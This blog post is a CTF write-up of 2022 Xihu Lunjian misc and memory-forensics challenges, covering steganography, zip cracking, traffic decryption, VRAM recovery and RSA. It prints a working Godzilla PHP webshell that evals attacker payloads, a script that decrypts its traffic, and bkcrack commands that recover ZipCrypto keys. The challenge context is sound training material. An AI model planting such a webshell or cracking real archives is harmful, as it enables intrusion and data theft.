2022西湖论剑MISC复现

2022西湖论剑MISC复现

强网杯快开始了,想着复现一下取证和misc的题目,刚好2022西湖论剑都有,而且难度也挺高

MISC

mp3

拿到cipher.mp3,听一下,熟悉的可以一下分辨出这是mp3stego的默认加解密音频,因为没有密码,先看看010

img

看到有个png,foremost分离一下

img

拿到只有黑白像素的png图片

img

按行转成010的二进制值然后再转成16进制数保存为文件看看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from PIL import Image
import struct

img = Image.open('00000646.png')
width, height = img.size

f = open('flag', 'wb')

flag = ''
#按行读取
for y in range(height):
    for x in range(width):
        flag += str(img.getpixel((x, y))//255)  #255//255 = 1 ; 0//255 = 0
#print(flag)
for i in range(0, len(flag), 8):
    f.write(struct.pack('B', int(flag[i:i+8], 2)))
f.close()

50 4B 03 04拿到zip,里面有个加密的47.txt

img

尝试了一下不是伪加密,回到mp3stego,无密码直接解密得到压缩包密码8750d5109208213f

img

拿到47.txt

1
2lO,.j2lL000iZZ2[2222iWP,.ZQQX,2.[002iZZ2[2020iWP,.ZQQX,2.[020iZZ2[2022iWLNZQQX,2.[2202iW2,2.ZQQX,2.[022iZZ2[2220iWPQQZQQX,2.[200iZZ2[202iZZ2[2200iWLNZQQX,2.[220iZZ2[222iZZ2[2000iZZ2[2002iZZ2Nj2]20lW2]20l2ZQQX,2]202.ZW2]02l2]20,2]002.XZW2]22lW2]2ZQQX,2]002.XZWWP2XZQQX,2]022.ZW2]00l2]20,2]220.XZW2]2lWPQQZQQX,2]002.XZW2]0lWPQQZQQX,2]020.XZ2]20,2]202.Z2]00Z2]02Z2]2j2]22l2]2ZWPQQZQQX,2]022.Z2]00Z2]0Z2]2Z2]22j2]2lW2]000X,2]20.,2]20.j2]2W2]2W2]22ZQ-QQZ2]2020ZWP,.ZQQX,2]020.Z2]2220ZQ--QZ2]002Z2]220Z2]020Z2]00ZQW---Q--QZ2]002Z2]000Z2]200ZQ--QZ2]002Z2]000Z2]002ZQ--QZ2]002Z2]020Z2]022ZQ--QZ2]002Z2]000Z2]022ZQ--QZ2]002Z2]020Z2]200ZQ--QZ2]002Z2]000Z2]220ZQLQZ2]2222Z2]2000Z2]000Z2]2002Z2]222Z2]020Z2]202Z2]222Z2]2202Z2]220Z2]2002Z2]2002Z2]2202Z2]222Z2]2222Z2]2202Z2]2022Z2]2020Z2]222Z2]2220Z2]2002Z2]222Z2]2020Z2]002Z2]202Z2]2200Z2]200Z2]2222Z2]2002Z2]200Z2]2022Z2]200ZQN---Q--QZ2]200Z2]000ZQXjQZQ-QQXWXXWXj

由47联想到rot47

img

类似jjencode,console直接解得到flag:DASCTF{f8097257d699d7fdba7e97a15c4f94b4}

img

take_the_zip_easy

拿到zipeasy.zip,里面是两个加密的文件,看到两个文件名字一样,猜想zip是pcapng压缩得到的,而且加密算法为ZipCrypto,有两段偏移可能相同,30-43:64 61 73 66 6C 6F 77 2E 70 63 61 70 6E 67,0-3:50 4B 03 04

尝试明文攻击

img

bkcrack.exe -C zipeasy.zip -x 30 646173666C6F772E706361706E67 -x 0 504B0304 -c dasflow.zip

1
2
3
4
5
6
7
8
bkcrack 1.5.0 - 2022-07-07
[19:36:43] Z reduction using 6 bytes of known plaintext
100.0 % (6 / 6)
[19:36:43] Attack on 1038290 Z values at index 37
Keys: 2b7d78f3 0ebcabad a069728c
67.7 % (703384 / 1038290)
[19:41:03] Keys
2b7d78f3 0ebcabad a069728c

bkcrack.exe -C zipeasy.zip -c dasflow.zip -k 2b7d78f3 0ebcabad a069728c -d dasflow.zip

得到dasflow.zip,解压得到dasflow.pcapng

简单看看,比较明显是哥斯拉流量,里面还有个flag.zip,stream 6里有原始的webshell,可以看到key为d8ea7326e6ec5916

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='air123';
$payloadName='payload';
$key='d8ea7326e6ec5916';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
                eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

stream 36哥斯拉流量解密得到加密flag.zip的原始命令,得到密码airDAS1231qaSW@

img

写脚本解密也行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$key='d8ea7326e6ec5916';

$endata = 'J%2B5pNzMyNmU2mij7dMD%2FqHMAa1dTUh6rZrUuY2l7eDVot058H%2BAZShmyrB3w%2FOdLFa2oeH%2FjYdeYr09l6fxhLPMsLeAwg8MkGmC%2BNbz1%2BkYvogF0EFH1p%2FKFEzIcNBVfDaa946G%2BynGJob9hH1%2BWlZFwyP79y4%2FcvxxKNVw8xP1OZWE3';
$dedata = gzdecode(encode(base64_decode(str_replace(' ','+',urldecode($endata))), $key));  //urldecode会将+号解析成空格,导致无法解密,replace回去
echo $dedata;

//cmdLinePsh -c "cd "/var/www/html/upload/";zip -o flag.zip /flag -P airDAS1231qaSW@" 2>&1methodNameexecCommand

导出flag.zip,解压得到flag

Fornesics

Isolated Machine Memory Analysis

参考 zysgmzb 空白

题目描述

张三,现用名叫Charlie,在一家外企工作,负责flag加密技术的研究。为了避免flag泄露,这家企业制定了严格的安全策略,严禁flag离开研发服务器,登录服务器必须经过跳板机。张三使用的跳板机是一台虚拟机,虽然被全盘加密没法提取,但好消息是至少还没关机。 免责声明:本题涉及的人名、单位名、产品名、域名及IP地址等均为虚构,如有雷同纯属巧合。 注:本题模拟真实研发环境,解题有关的信息不会出现在人名、域名或IP地址等不合常理的地方。链接:https://pan.baidu.com/s/1WESej-pyjWKZni7drZGTig?pwd=cq46 提取码:cq46

hint

Hint: hint1:在张三的电脑上发现一张截图,看起来应该是配置跳板机时无意留下的。

img

hint2:为什么这个Windows内存镜像是ELF格式? hint3:https://github.com/volatilityfoundation/volatility/wiki/Virtual-Box-Core-Dump#meta-data

取证,但是拿到一个elf

volatility_2.6_win64_standalone.exe -f CharlieBrown-PC.elf imageinfo

1
2
3
Volatility Foundation Volatility Framework 2.6
INFO    : volatility.debug    : Determining profile based on KDBG search...
          Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_23418

volatility_2.6_win64_standalone.exe -f CharlieBrown-PC.elf --profile=Win7SP1x64 pslist

其他的省略,重点看这几个,VBoxTray类似vmtool,VBoxService可以确定有VirtualBox,mstsc说明有远程桌面,ClipboardMonit使用了剪贴板

1
2
3
4
5
6
7
8
9
10
11
12
13
Volatility Foundation Volatility Framework 2.6
Offset(V)          Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit

------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
...
0xfffffa8004d307a0 VBoxService.ex          648    460     13      116      0      0 2022-11-02 07:10:56 UTC+0000
...
0xfffffa800384d9b0 VBoxTray.exe           1884    300     12      138      1      0 2022-11-01 16:12:09 UTC+0000
...
0xfffffa8003854b00 ClipboardMonit         1516    300      1       47      1      0 2022-11-01 16:12:09 UTC+0000
...
0xfffffa80050f2b00 mstsc.exe              2840    300     14      715      1      0 2022-11-01 16:12:35 UTC+0000
...

先看剪贴板内容

volatility_2.6_win64_standalone.exe -f CharlieBrown-PC.elf --profile=Win7SP1x64 clipboard

1
2
3
4
5
6
7
8
9
10
Volatility Foundation Volatility Framework 2.6
Session    WindowStation Format                         Handle Object             Data
---------- ------------- ------------------ ------------------ ------------------ --------------------------------------------------
         1 WinSta0       0xc009L                       0x901c1 0xfffff900c00e26b0
         1 WinSta0       CF_TEXT                  0x7400000001 ------------------
         1 WinSta0       CF_UNICODETEXT                0x7021f 0xfffff900c1df7970 -----BEGIN PUBLIC KEY---...----END PUBLIC KEY-----
         1 WinSta0       CF_TEXT                           0x0 ------------------
         1 WinSta0       CF_LOCALE                         0x0 ------------------
         1 WinSta0       0x0L                              0x0 ------------------
         1 ------------- ------------------            0x901a3 0xfffff900c01f2cc0

看到有rsa公钥开头的data,-v查看详细信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
Volatility Foundation Volatility Framework 2.6
Session    WindowStation Format                         Handle Object             Data
---------- ------------- ------------------ ------------------ ------------------ --------------------------------------------------
         1 WinSta0       0xc009L                       0x901c1 0xfffff900c00e26b0
0xfffff900c00e26c4  5e 01 03 00 00 00 00 00                           ^.......
         1 WinSta0       CF_TEXT                  0x7400000001 ------------------
         1 WinSta0       CF_UNICODETEXT                0x7021f 0xfffff900c1df7970 -----BEGIN PUBLIC KEY---...----END PUBLIC KEY-----
0xfffff900c1df7984  2d 00 2d 00 2d 00 2d 00 2d 00 42 00 45 00 47 00   -.-.-.-.-.B.E.G.
0xfffff900c1df7994  49 00 4e 00 20 00 50 00 55 00 42 00 4c 00 49 00   I.N...P.U.B.L.I.
0xfffff900c1df79a4  43 00 20 00 4b 00 45 00 59 00 2d 00 2d 00 2d 00   C...K.E.Y.-.-.-.
0xfffff900c1df79b4  2d 00 2d 00 0d 00 0a 00 4d 00 46 00 6f 00 77 00   -.-.....M.F.o.w.
0xfffff900c1df79c4  44 00 51 00 59 00 4a 00 4b 00 6f 00 5a 00 49 00   D.Q.Y.J.K.o.Z.I.
0xfffff900c1df79d4  68 00 76 00 63 00 4e 00 41 00 51 00 45 00 42 00   h.v.c.N.A.Q.E.B.
0xfffff900c1df79e4  42 00 51 00 41 00 44 00 53 00 51 00 41 00 77 00   B.Q.A.D.S.Q.A.w.
0xfffff900c1df79f4  52 00 67 00 4a 00 42 00 41 00 49 00 45 00 5a 00   R.g.J.B.A.I.E.Z.
0xfffff900c1df7a04  54 00 78 00 78 00 6c 00 65 00 37 00 2b 00 35 00   T.x.x.l.e.7.+.5.
0xfffff900c1df7a14  72 00 79 00 77 00 43 00 35 00 62 00 79 00 49 00   r.y.w.C.5.b.y.I.
0xfffff900c1df7a24  75 00 42 00 6b 00 50 00 68 00 77 00 6b 00 79 00   u.B.k.P.h.w.k.y.
0xfffff900c1df7a34  76 00 35 00 37 00 52 00 0d 00 0a 00 37 00 35 00   v.5.7.R.....7.5.
0xfffff900c1df7a44  36 00 44 00 55 00 43 00 44 00 39 00 69 00 32 00   6.D.U.C.D.9.i.2.
0xfffff900c1df7a54  4d 00 57 00 59 00 79 00 55 00 73 00 30 00 41 00   M.W.Y.y.U.s.0.A.
0xfffff900c1df7a64  63 00 63 00 36 00 4a 00 5a 00 77 00 79 00 71 00   c.c.6.J.Z.w.y.q.
0xfffff900c1df7a74  56 00 4f 00 6d 00 52 00 37 00 34 00 75 00 4d 00   V.O.m.R.7.4.u.M.
0xfffff900c1df7a84  76 00 72 00 65 00 49 00 32 00 73 00 6c 00 6c 00   v.r.e.I.2.s.l.l.
0xfffff900c1df7a94  65 00 34 00 47 00 79 00 37 00 48 00 6c 00 36 00   e.4.G.y.7.H.l.6.
0xfffff900c1df7aa4  50 00 63 00 58 00 78 00 45 00 43 00 41 00 51 00   P.c.X.x.E.C.A.Q.
0xfffff900c1df7ab4  49 00 3d 00 0d 00 0a 00 2d 00 2d 00 2d 00 2d 00   I.=.....-.-.-.-.
0xfffff900c1df7ac4  2d 00 45 00 4e 00 44 00 20 00 50 00 55 00 42 00   -.E.N.D...P.U.B.
0xfffff900c1df7ad4  4c 00 49 00 43 00 20 00 4b 00 45 00 59 00 2d 00   L.I.C...K.E.Y.-.
0xfffff900c1df7ae4  2d 00 2d 00 2d 00 2d 00 00 00                     -.-.-.-...

处理一下得到公钥,暂时没有什么用,再看其他

1
2
3
4
-----BEGIN PUBLIC KEY-----
MFowDQYJKoZIhvcNAQEBBQADSQAwRgJBAIEZTxxle7+5rywC5byIuBkPhwkyv57R
756DUCD9i2MWYyUs0Acc6JZwyqVOmR74uMvreI2slle4Gy7Hl6PcXxECAQI=
-----END PUBLIC KEY-----

看看截图

volatility_2.6_win64_standalone.exe -f CharlieBrown-PC.elf --profile=Win7SP1x64 screenshot -D ./

看到上面有一串mac地址

img

netscan看看网络连接

volatility_2.6_win64_standalone.exe -f CharlieBrown-PC.elf --profile=Win7SP1x64 netscan

1
2
3
4
Volatility Foundation Volatility Framework 2.6
...
0x11e73f010        TCPv6    fc00:19e9:ee8a:7784:645a:2b7a:f7ab:64:49158 fc00:19e9:ee8a:7784:645a:2b7a:f7ab:4:3389 ESTABLISHED      -1
...

根据题目描述可以大概猜到这是跳板机和服务器的网络连接

看远程桌面,先尝试找bmc文件,原理:https://www.hetianlab.com/specialized/20210713143551

volatility_2.6_win64_standalone.exe -f CharlieBrown-PC.elf --profile=Win7SP1x64 filescan | findstr ".bmc"

1
2
3
Volatility Foundation Volatility Framework 2.6
0x00000000085889e0     17      1 RW-r-- \Device\HarddiskVolume2\Users\Charlie Brown\AppData\Local\Microsoft\Terminal Server Client\Cache\bcache24.bmc
0x000000011fed52a0     14      0 R--rw- \Device\HarddiskVolume2\Users\Charlie Brown\AppData\Local\Microsoft\Terminal Server Client\Cache\bcache24.bmc

但是导出后分离不出图片

那么就memdump将mstsc的内存保存到本地

volatility_2.6_win64_standalone.exe -f CharlieBrown-PC.elf --profile=Win7SP1x64 memdump -p 2840 -D ./

1
2
3
Volatility Foundation Volatility Framework 2.6
************************************************************************
Writing mstsc.exe [  2840] to 2840.dmp

修改成.data后缀,用gimp调一下参,得到提示不在RAM中

img

再看回hint1,有vbox显示器的分辨率、显卡等信息

又根据hint3https://github.com/volatilityfoundation/volatility/wiki/Virtual-Box-Core-Dump#meta-data

猜测可能在VRAM中

利用vboxinfo找内存信息

volatility_2.6_win64_standalone.exe -f CharlieBrown-PC.elf --profile=Win7SP1x64 vboxinfo

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
Volatility Foundation Volatility Framework 2.6
Magic: 0xc01ac0de
Format: 0x10006
VirtualBox 7.0.2 (revision 154219)
CPUs: 2

FileOffset       Memory Offset    Size
          0x4a2c              0x0    0xa0000
         0xa4a2c          0xc0000     0x9000
         0xada2c          0xe0000     0x1000
         0xaea2c          0xe1000     0x1000
         0xafa2c          0xe2000     0xe000
         0xbda2c          0xf0000    0x10000
         0xcda2c         0x100000   0x100000
        0x1cda2c         0x200000 0xdfe00000
      0xdffcda2c       0xe0000000  0x2000000
      0xe1fcda2c       0xf0000000   0x200000
      0xe21cda2c       0xf0400000   0x400000
      0xe25cda2c       0xf0800000     0x4000
      0xe25d1a2c       0xffff0000    0x10000
      0xe25e1a2c      0x100000000 0x20000000

根据hint3找到VRAM的位置

The VGA/video memory beings at 0xe0000000 on both x86 and x64 systems.

0xdffcda2c 0xe0000000 0x2000000

那么偏移0xdffcda2c,大小0x2000000

可以手动或者用dd命令提取出显存数据

dd if=CharlieBrown-PC.elf of=vram skip=3757890092 bs=1 count=33554432

建议手动,dd命令会很久

img

保存为VRAM,观察发现4字节一组,代表RGBA,由hint1的分辨率得到图片宽高,编写脚本将data转成图片

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from PIL import Image

width = 1440
height = 900
flag = open('VRAM','rb').read()

def makeSourceImg():
    img = Image.new('RGBA', (width, height))
    x = 0
    for i in range(height):
        for j in range(width):
            img.putpixel((j, i), (flag[x], flag[x + 1], flag[x + 2],flag[x+3]))
            x += 4
    return img

img = makeSourceImg()
img.save('1.png')

得到png,这就是对应刚刚的远程桌面的屏幕截图

img

拿到c

1
089ebf3622f6f6d498c1b5ecfe4d831d3e876bf55578586389127e0053bb4fe006e2eee5398b86274fdce0418d16c9bb0bf24922cec491b3047d33eb661784c9

接下来就是rsa解密了

在线网站解析公钥http://www.hiencode.com/pub_asys.html,拿到n和e,n可以直接分解得到p,q

e=2,rabin

img

这道题目是一道比较新也很巧妙的题,利用了vbox虚拟机elf core dump包含额外的VRAM数据来还原远程桌面的截图,最后结合了rsa,一开始做题还毫无头绪,参考了两位师傅的wp后能慢慢理清思路。

ctf misc
#misc #wp
2022西湖论剑MISC复现
http://example.com/2023/11/30/2022西湖论剑MISC复现/
作者
dddkia
发布于
2023年11月30日
许可协议